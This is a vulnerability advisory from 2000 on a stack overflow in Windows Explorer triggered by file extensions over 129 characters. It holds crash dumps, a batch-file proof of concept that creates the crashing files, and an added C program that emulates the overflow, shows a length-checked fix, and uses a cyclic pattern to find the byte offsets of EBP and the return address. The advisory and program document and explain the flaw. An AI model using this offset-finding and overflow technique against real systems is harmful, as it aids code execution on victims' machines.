Win9x/SE explorer.exe long file extension handling vulnerability

Published: 2000-04-21
Updated: 2000-04-21
Severity: Medium
Threat level: normal user access privileges
Error type: input validation error
Exploitation: client-side
Affected systems: WinNT (as listed in the original advisory; the title and the "invalid page fault" dialogs below are Windows 9x/SE)

Detailed description

When Microsoft's Explorer tries to handle a file whose extension is longer than 129 characters, a stack buffer overflows and the following dialog appears:

EXPLORER caused an invalid page fault in module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161

EIP (and EBP) have been overwritten with 0x61616161, the bytes "aaaa" from the extension: the saved return address was replaced with attacker-controlled data, so execution can be redirected to arbitrary code. There is no "Bytes at CS:EIP" line because 0x61616161 is not a mapped address. The advisory states that 247+129+118 bytes are available to hold shellcode.

Test code

Create the following .bat file:

---- cut here
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.
dir *.* > _??-----Buffer overflow----------- aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)
dir *.* > _??-----Blue-screen-of-death------ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678怉 AAAAAAAAA
--- cut here

If the resulting file is sent as an attachment in Eudora, the following dialog appears:

EUDORA caused an invalid page fault in module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:

Solution

None available.

Related information

None.
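The following is an added example written for this page; it is not code from the advisory or from Microsoft's Explorer. It reconstructs the class of bug the crash dump shows (an unbounded copy of the extension into a fixed stack buffer, spilling into the saved EBP and the return address), places the hardened length-checked copy beside it, and goes one step beyond the all-'a' proof of concept: replacing the run of 'a' with a cyclic pattern so the value observed in EIP maps back to an exact byte offset in the extension. The 128-byte buffer size, the cdecl-style frame layout (buffer, saved EBP, return address) and the pre-overflow register values are assumptions; the advisory only gives the ">129 characters" threshold. The overflow is emulated in a struct with the copy clamped to the struct's size so the program itself is well-defined; the real bug has no such clamp.

```c
/* Added example, not from the advisory: emulated long-extension overflow,
 * hardened copy, and cyclic-pattern offset recovery. Assumptions: 128-byte
 * stack buffer, x86 frame = buffer | saved EBP | return address, little-endian. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EXT_BUF 128      /* assumed size of the extension buffer */
#define MAX_EXT 1024     /* upper bound used by the helpers below */

struct frame {           /* assumed stack frame around the buffer */
    char     buf[EXT_BUF];
    uint32_t saved_ebp;
    uint32_t ret;
};

/* Extension = text after the last '.', or NULL when there is none. */
static const char *file_ext(const char *name) {
    const char *dot = strrchr(name, '.');
    return (dot && dot[1] != '\0') ? dot + 1 : NULL;
}

/* Vulnerable pattern: no check against EXT_BUF, so bytes 128..131 of the
 * extension land in saved_ebp and bytes 132..135 in ret. The copy is clamped
 * to the struct only to keep this emulation well-defined. */
static void emulate_unchecked_copy(const char *name, struct frame *f) {
    const char *ext = file_ext(name);
    size_t n = ext ? strlen(ext) : 0;
    memset(f, 0, sizeof *f);
    f->saved_ebp = 0x01a1d8fcu;   /* arbitrary pre-overflow values */
    f->ret       = 0x7fcbd320u;
    if (n > sizeof *f) n = sizeof *f;
    if (n) memcpy(f->buf, ext, n);
}

/* Hardened form: reject any extension that does not fit. 0 = ok, -1 = rejected. */
int copy_ext_checked(const char *name, char *out, size_t out_len) {
    const char *ext = file_ext(name);
    size_t n = ext ? strlen(ext) : 0;
    if (out_len == 0 || n >= out_len) return -1;
    if (n) memcpy(out, ext, n);
    out[n] = '\0';
    return 0;
}

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
 * unique within the first 20280 bytes. Writes len bytes plus a NUL. */
void pattern_create(char *out, size_t len) {
    for (size_t i = 0; i < len; i++) {
        size_t t = i / 3;                       /* index of the (A,a,0) triple */
        char trip[3] = { (char)('A' + (t / 260) % 26),
                         (char)('a' + (t / 10) % 26),
                         (char)('0' + t % 10) };
        out[i] = trip[i % 3];
    }
    out[len] = '\0';
}

/* Offset of the little-endian bytes of reg inside the pattern, or -1. */
long pattern_offset(const char *pat, size_t len, uint32_t reg) {
    unsigned char needle[4] = { (unsigned char)reg, (unsigned char)(reg >> 8),
                                (unsigned char)(reg >> 16), (unsigned char)(reg >> 24) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Constructed file name "poc." + n copies of fill, like the batch file's run of 'a'. */
static void make_name(char *out, char fill, size_t n) {
    memcpy(out, "poc.", 4);
    memset(out + 4, fill, n);
    out[4 + n] = '\0';
}

/* Return address after the unchecked copy of an n-byte extension of fill bytes. */
uint32_t ret_for_fill(char fill, size_t n) {
    char name[MAX_EXT + 8];
    struct frame f;
    if (n > MAX_EXT) n = MAX_EXT;
    make_name(name, fill, n);
    emulate_unchecked_copy(name, &f);
    return f.ret;
}

/* Result of the hardened copy for an n-char extension into an EXT_BUF buffer. */
int checked_copy_result(size_t n) {
    char name[MAX_EXT + 8], out[EXT_BUF];
    if (n > MAX_EXT) n = MAX_EXT;
    make_name(name, 'a', n);
    return copy_ext_checked(name, out, sizeof out);
}

/* Pattern offsets that end up in saved EBP and in the return address. */
static void offsets_for(size_t ext_len, long *ebp_off, long *ret_off) {
    char pat[MAX_EXT + 1], name[MAX_EXT + 8];
    struct frame f;
    if (ext_len > MAX_EXT) ext_len = MAX_EXT;
    pattern_create(pat, ext_len);
    memcpy(name, "poc.", 4);
    memcpy(name + 4, pat, ext_len + 1);
    emulate_unchecked_copy(name, &f);
    *ebp_off = pattern_offset(pat, ext_len, f.saved_ebp);
    *ret_off = pattern_offset(pat, ext_len, f.ret);
}
long ebp_offset(size_t ext_len) { long e, r; offsets_for(ext_len, &e, &r); return e; }
long ret_offset(size_t ext_len) { long e, r; offsets_for(ext_len, &e, &r); return r; }

int main(void) {
    printf("EIP after 140 x 'a': 0x%08x\n", (unsigned)ret_for_fill('a', 140));
    printf("EIP after 100 x 'a': 0x%08x (untouched)\n", (unsigned)ret_for_fill('a', 100));
    printf("pattern: EBP <- offset %ld, EIP <- offset %ld\n", ebp_offset(200), ret_offset(200));
    printf("checked copy, 140-char ext: %d (rejected)\n", checked_copy_result(140));
    return 0;
}
```

With the assumed layout, a 140-character run of 'a' reproduces the advisory's EIP=61616161 and EBP=61616161, a 100-character extension leaves the return address untouched, and a pattern extension reports EBP at offset 128 and EIP at offset 132, which is where a real return address (and the shellcode the advisory says there is room for) would be placed. The checked copy refuses the long extension outright, which is the fix the advisory lacks.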